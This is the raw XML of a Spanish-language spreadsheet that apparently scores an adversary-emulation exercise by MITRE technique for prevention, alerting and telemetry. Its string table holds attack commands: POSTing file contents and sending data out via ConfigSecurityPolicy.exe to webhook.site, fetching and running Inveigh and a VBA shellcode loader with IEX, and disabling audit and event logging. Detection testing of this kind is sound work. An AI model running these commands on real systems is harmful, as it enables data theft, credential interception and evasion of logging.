    <t>C2 Data Exfiltration</t>
  </si>
  <si>
    <t>if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ 
  1..100 | ForEach-Object { Add-Content -Path $env:TEMP\LineNumbers.txt -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt
Invoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive</t>
  </si>
  <si>
    <t>Data Exfiltration with ConfigSecurityPolicy</t>
  </si>
  <si>
    <t>$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe";  $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"</t>
  </si>
  <si>
    <t>Get-ChildItem C:\Users -Recurse -Include *.EXTENSION -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;
exit 0;</t>
  </si>
  <si>
    <t>Locate files deemed sensitive</t>
  </si>
  <si>
    <t>Cambiar extensión por archivos sensibles</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>LLMNR Poisoning with Inveigh (PowerShell)</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y</t>
  </si>
  <si>
    <t>Privilegios</t>
  </si>
  <si>
    <t>$seceditFile = "./secpol.txt"; secedit /export /cfg $seceditFile | out-null</t>
  </si>
  <si>
    <t>secedit - Configura y 
analiza la seguridad del sistema</t>
  </si>
  <si>
    <t>$gpoFile = "./gpo.txt";gpresult /r /V &gt; $gpoFile | out-null</t>
  </si>
  <si>
    <t>para mejorar los resultado es preferible con privilegios</t>
  </si>
  <si>
    <t>configuraciones de directiva</t>
  </si>
  <si>
    <t>net accounts</t>
  </si>
  <si>
    <t>valores actuales de contraseña</t>
  </si>
  <si>
    <t>Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"</t>
  </si>
  <si>
    <t>Ver estado de las cuentas</t>
  </si>
  <si>
    <t>Consulta a registros</t>
  </si>
  <si>
    <t>Ejecución (si, no, parcial)</t>
  </si>
  <si>
    <t>Equipo que bloqueo</t>
  </si>
  <si>
    <t>Alertamiento</t>
  </si>
  <si>
    <t>Bitacoras(existen, no existen)</t>
  </si>
  <si>
    <t>Calida de la información</t>
  </si>
  <si>
    <t>Shellcode execution via VBA</t>
  </si>
  <si>
    <t>New-Item -Type Directory (split-path PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"</t>
  </si>
  <si>
    <t>Debe tener office instalado</t>
  </si>
  <si>
    <t>Enumerate Active Directory Groups with Get-AdGroup</t>
  </si>
  <si>
    <t>Capitulos</t>
  </si>
  <si>
    <t>Prevención</t>
  </si>
  <si>
    <t>Telemetria</t>
  </si>
  <si>
    <t>2 pruebas</t>
  </si>
  <si>
    <t>Impair Windows Audit Log Policy</t>
  </si>
  <si>
    <t>auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable</t>
  </si>
  <si>
    <t>auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable</t>
  </si>
  <si>
    <t>Disable Event Logging with wevtutil</t>
  </si>
  <si>
    <t>wevtutil sl Microsoft-Windows-IKE/Operational /e:false</t>
  </si>
  <si>
    <t>wevtutil sl Microsoft-Windows-IKE/Operational /e:true</t>
  </si>
  <si>
    <t>3 pruebas</t>
  </si>
  <si>
    <t>4 pruebas</t>
  </si>
  <si>
    <t>7 pruebas</t>
  </si>
  <si>
    <t>1 prueba</t>
  </si>
  <si>
    <t>23 pruebas</t>
  </si>
  <si>
    <t>Create a new user in a command prompt</t>
  </si>
  <si>
    <t>Create a new user in PowerShell</t>
  </si>
  <si>
    <t>Create a new Windows domain admin user</t>
  </si>
  <si>
    <t>Create a new Domain Account using PowerShell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</si>
</sst>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C9D1D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inden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Capítulo 12.01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77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Graf_PT!$B$1:$D$1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Graf_PT!$B$2:$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.62068965517241381</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.41379310344827586</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.44827586206896552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52D-A2DC-83DE6EB0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02095"/>
        <c:axId val="882901263"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="8829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2901263"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="882901263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4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29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Capitulo 13.03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Graf_PT!$T$1:$V$1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Graf_PT!$T$2:$V$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3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0-4D57-96E7-ACA2C610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62431"/>
        <c:axId val="888363263"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="88836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8363263"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="888363263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5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836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Capitulo 12.02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Graf_PT!$B$20:$D$20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Graf_PT!$B$21:$D$21</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.41379310344827586</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.41379310344827586</c:v>
                </c:pt>
                <c:pt idx="2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1-41E4-BBFE-A784613F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72047"/>
        <c:axId val="886768719"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="8867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6768719"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="88676871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5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677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Capitulo 12.03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Graf_PT!$B$39:$D$39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Graf_PT!$B$40:$D$40</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.36</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.48</c:v>
                </c:pt>
                <c:pt idx="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B-4D0F-AD79-3F615442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23727"/>
        <c:axId val="882924143"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="88292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2924143"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="882924143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292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Capitulo 12.04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77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Graf_PT!$H$1:$J$1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Graf_PT!$H$2:$J$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.41666666666666669</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.33333333333333331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49DB-86DF-0CB32BE0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38367"/>
        <c:axId val="915252095"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="91523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5252095"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91525209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50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alpha val="0"/>
                </a:scheme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crossAx val="91523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Capitulo 12.05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77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Graf_PT!$H$20:$J$20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Graf_PT!$H$21:$J$21</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.3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9-43D1-B892-8D68AC36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05551"/>
        <c:axId val="914804303"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="9148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4804303"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="914804303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480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Capitulo 12.06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77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Graf_PT!$H$39:$J$39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Graf_PT!$H$40:$J$40</c:f>
              <c:numCache>
                <c:formatCode>General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0.57692307692307687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5-48E9-8018-AE9D86AD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74575"/>
        <c:axId val="910971247"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="91097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0971247"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91097124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097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Capitulo 12.07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71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Graf_PT!$N$1:$P$1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Graf_PT!$N$2:$P$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3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601-A27A-4E9364F6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37327"/>
        <c:axId val="916235247"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="9162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6235247"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91623524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5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623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Capitulo 12.08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76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Graf_PT!$N$20:$P$20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Graf_PT!$N$21:$P$21</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.33333333333333331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8-4BBA-B36C-8131DFAC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02815"/>
        <c:axId val="940501983"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="9405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0501983"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="940501983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5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05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Capitulo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" baseline="0"/>
              <a:t> 13.01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75000"/>
                <a:alpha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Graf_PT!$N$39:$P$39</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>Prevención</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Alertamiento</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Telemetria</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graf_PT!$N$40:$P$40</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.41666666666666669</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.25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2-4739-980A-ED09DCBB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51919"/>
        <c:axId val="915952335"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="9159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5952335"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="91595233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5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595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2</xdr:row>
      <xdr:rowOff>115877</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>265123</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>107602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34EAB-298F-2D1B-C659-EDFCB868F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74612</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>106362</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>269462</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>134937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42AA2A-F43C-F657-295E-51F185644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65087</xdr:colOff>
      <xdr:row>40</xdr:row>
      <xdr:rowOff>96837</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>259937</xdr:colOff>
      <xdr:row>55</xdr:row>
      <xdr:rowOff>125412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D1EFDD-4F44-B66C-72AE-BCA1120A6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636587</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>103187</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>278987</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>131762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463CC0-5CF8-A1B1-7193-96DF8FB19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715962</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>122237</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>351162</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>150812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26074F-2BA1-590C-73BA-F3452D5B8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712787</xdr:colOff>
      <xdr:row>40</xdr:row>
      <xdr:rowOff>115887</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>354337</xdr:colOff>
      <xdr:row>55</xdr:row>
      <xdr:rowOff>144462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9AAB2A4-E4A2-1350-27DA-64A40C764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569912</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>106362</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>211462</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>131762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CF0CF2D-1C36-A2CF-D541-6D8A21FF9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579437</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>96837</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>220987</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>125412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2C46975-1A04-73C1-6807-1E270FF6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541337</xdr:colOff>
      <xdr:row>40</xdr:row>
      <xdr:rowOff>96837</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>182887</xdr:colOff>
      <xdr:row>55</xdr:row>
      <xdr:rowOff>125412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83C752-D6E0-FACA-A531-34A47000E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608012</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>96837</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>22</xdr:col>
      <xdr:colOff>240037</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>125412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48FE51F-4462-4491-7564-41726B2F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D1FF-9585-489B-8A91-F40CB7A0C6C1}">
  <dimension ref="A1:N130"/>
  <sheetViews>
    <sheetView zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <selection activeCell="M6" sqref="M6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="7.90625" customWidth="1"/>
    <col min="2" max="2" width="14.08984375" customWidth="1"/>
    <col min="3" max="3" width="46.26953125" customWidth="1"/>
    <col min="4" max="4" width="8.7265625" customWidth="1"/>
    <col min="5" max="5" width="8.26953125" customWidth="1"/>
    <col min="6" max="6" width="58.54296875" customWidth="1"/>
    <col min="7" max="7" width="49.7265625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="30.81640625" customWidth="1"/>
    <col min="10" max="10" width="21.7265625" customWidth="1"/>
    <col min="11" max="11" width="18.08984375" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="12.7265625" customWidth="1"/>
    <col min="13" max="13" width="26.453125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="21.54296875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>29</v>
      </c>
      <c r="D1" t="s">
        <v>31</v>
      </c>
      <c r="E1" t="s">
        <v>3</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
      <c r="G1" t="s">
        <v>8</v>
      </c>
      <c r="H1" t="s">
        <v>13</v>
      </c>
      <c r="I1" t="s">
        <v>14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</row>
    <row r="2" spans="1:14" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A2" s="3">
        <v>12.01</v>
      </c>
      <c r="B2" t="s">
        <v>5</v>
      </c>
      <c r="C2" t="s">
        <v>400</v>
      </c>
      <c r="D2" t="s">
        <v>32</v>
      </c>
      <c r="E2" t="s">
        <v>6</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>12</v>
      </c>
      <c r="G2" t="s">
        <v>7</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>15</v>
      </c>
      <c r="J2">
        <f ca="1">RANDBETWEEN(0,1)</f>
        <v>0</v>
      </c>
      <c r="L2">
        <f ca="1">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
      <c r="M2">
        <f ca="1">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3" spans="1:14" x14ac:dyDescent="0.35">
      <c r="C3" t="s">
        <v>401</v>
      </c>
      <c r="D3" t="s">
        <v>32</v>
      </c>
      <c r="E3" t="s">
        <v>9</v>
      </c>
      <c r="F3" t="s">
        <v>10</v>
      </c>
      <c r="G3" t="s">
        <v>11</v>
      </c>
      <c r="J3">
        <f t="shared" ref="J3:J64" ca="1" si="0">RANDBETWEEN(0,1)</f>
        <v>1</v>
      </c>
      <c r="L3">
        <f t="shared" ref="L3:M64" ca="1" si="1">RANDBETWEEN(0,1)</f>
        <v>0</v>
      </c>
      <c r="M3">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:14" ht="33" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A4" s="2"/>
      <c r="B4" t="s">
        <v>16</v>
      </c>
      <c r="C4" t="s">
        <v>402</v>
      </c>
      <c r="D4" t="s">
        <v>49</v>
      </c>
      <c r="E4" t="s">
        <v>6</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G4" t="s">
        <v>18</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>15</v>
      </c>
      <c r="J4">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L4">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M4">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:14" ht="32" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C5" t="s">
        <v>403</v>
      </c>
      <c r="D5" t="s">
        <v>49</v>
      </c>
      <c r="E5" t="s">
        <v>9</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>19</v>
      </c>
      <c r="G5" t="s">
        <v>20</v>
      </c>
      <c r="J5">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L5">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M5">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:14" ht="43.5" x14ac:dyDescent="0.35">
      <c r="B6" t="s">
        <v>21</v>
      </c>
      <c r="C6" t="s">
        <v>236</v>
      </c>
      <c r="D6" t="s">
        <v>32</v>
      </c>
      <c r="E6" t="s">
        <v>6</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>22</v>
      </c>
      <c r="G6" t="s">
        <v>23</v>
      </c>
      <c r="J6">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L6">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M6">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:14" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C7" t="s">
        <v>237</v>
      </c>
      <c r="D7" t="s">
        <v>32</v>
      </c>
      <c r="E7" t="s">
        <v>6</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>24</v>
      </c>
      <c r="G7" t="s">
        <v>25</v>
      </c>
      <c r="J7">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L7">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M7">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:14" ht="43.5" x14ac:dyDescent="0.35">
      <c r="C8" t="s">
        <v>238</v>
      </c>
      <c r="D8" t="s">
        <v>32</v>
      </c>
      <c r="E8" t="s">
        <v>6</v>
      </c>
      <c r="F8" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G8" t="s">
        <v>27</v>
      </c>
      <c r="J8">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L8">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M8">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:14" x14ac:dyDescent="0.35">
      <c r="C9" t="s">
        <v>239</v>
      </c>
      <c r="D9" t="s">
        <v>49</v>
      </c>
      <c r="E9" t="s">
        <v>9</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>240</v>
      </c>
      <c r="G9" t="s">
        <v>241</v>
      </c>
      <c r="J9">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L9">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M9">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:14" ht="34" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B10" t="s">
        <v>28</v>
      </c>
      <c r="C10" t="s">
        <v>30</v>
      </c>
      <c r="D10" t="s">
        <v>32</v>
      </c>
      <c r="E10" t="s">
        <v>9</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>33</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J10">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L10">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M10">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:14" ht="34" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C11" t="s">
        <v>305</v>
      </c>
      <c r="D11" t="s">
        <v>32</v>
      </c>
      <c r="E11" t="s">
        <v>9</v>
      </c>
      <c r="F11" s="1" t="s">
        <v>306</v>
      </c>
      <c r="G11" s="1" t="s">
        <v>307</v>
      </c>
      <c r="J11">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L11">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M11">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:14" ht="35" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B12" t="s">
        <v>53</v>
      </c>
      <c r="C12" t="s">
        <v>35</v>
      </c>
      <c r="D12" t="s">
        <v>32</v>
      </c>
      <c r="E12" t="s">
        <v>6</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>36</v>
      </c>
      <c r="G12" s="1" t="s">
        <v>37</v>
      </c>
      <c r="J12">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L12">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M12">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:14" ht="30" customHeight="1" x14ac:dyDescent="0.35">
      <c r="D13" t="s">
        <v>32</v>
      </c>
      <c r="E13" t="s">
        <v>9</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>39</v>
      </c>
      <c r="J13">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L13">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M13">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:14" x14ac:dyDescent="0.35">
      <c r="B14" t="s">
        <v>40</v>
      </c>
      <c r="C14" t="s">
        <v>41</v>
      </c>
      <c r="D14" t="s">
        <v>32</v>
      </c>
      <c r="E14" t="s">
        <v>6</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>42</v>
      </c>
      <c r="G14" s="1" t="s">
        <v>43</v>
      </c>
      <c r="H14" t="s">
        <v>44</v>
      </c>
      <c r="J14">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L14">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M14">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:14" x14ac:dyDescent="0.35">
      <c r="C15" t="s">
        <v>45</v>
      </c>
      <c r="D15" t="s">
        <v>32</v>
      </c>
      <c r="E15" t="s">
        <v>6</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>46</v>
      </c>
      <c r="G15" s="1" t="s">
        <v>47</v>
      </c>
      <c r="H15" t="s">
        <v>44</v>
      </c>
      <c r="J15">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L15">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M15">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:14" x14ac:dyDescent="0.35">
      <c r="C16" t="s">
        <v>48</v>
      </c>
      <c r="D16" t="s">
        <v>49</v>
      </c>
      <c r="E16" t="s">
        <v>6</v>
      </c>
      <c r="F16" s="1" t="s">
        <v>50</v>
      </c>
      <c r="G16" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H16" t="s">
        <v>52</v>
      </c>
      <c r="J16">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L16">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M16">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" ht="45.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B17" t="s">
        <v>54</v>
      </c>
      <c r="C17" t="s">
        <v>381</v>
      </c>
      <c r="D17" t="s">
        <v>49</v>
      </c>
      <c r="E17" t="s">
        <v>9</v>
      </c>
      <c r="F17" s="1" t="s">
        <v>382</v>
      </c>
      <c r="G17" s="1" t="s">
        <v>51</v>
      </c>
      <c r="H17" t="s">
        <v>383</v>
      </c>
      <c r="J17">
        <f t="shared" ca="1" si="0"/>
        <v>0</v>
      </c>
      <c r="L17">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M17">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:13" ht="34.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B18" t="s">
        <v>55</v>
      </c>
      <c r="C18" t="s">
        <v>341</v>
      </c>
      <c r="D18" t="s">
        <v>32</v>
      </c>
      <c r="E18" t="s">
        <v>124</v>
      </c>
      <c r="F18" s="1" t="s">
        <v>342</v>
      </c>
      <c r="J18">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L18">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M18">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:13" ht="39.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B19" t="s">
        <v>56</v>
      </c>
      <c r="C19" t="s">
        <v>57</v>
      </c>
      <c r="D19" t="s">
        <v>58</v>
      </c>
      <c r="E19" t="s">
        <v>6</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>59</v>
      </c>
      <c r="J19">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L19">
        <f t="shared" ca="1" si="1"/>
        <v>0</v>
      </c>
      <c r="M19">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:13" ht="40" customHeight="1" x14ac:dyDescent="0.35">
      <c r="C20" t="s">
        <v>60</v>
      </c>
      <c r="D20" t="s">
        <v>49</v>
      </c>
      <c r="E20" t="s">
        <v>6</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>61</v>
      </c>
      <c r="G20" s="1" t="s">
        <v>62</v>
      </c>
      <c r="J20">
        <f t="shared" ca="1" si="0"/>
        <v>1</v>
      </c>
      <c r="L20">
        <f t="shared" ca="1" si="1"/>
        <v>1</v>
      </c>
      <c r="M20">
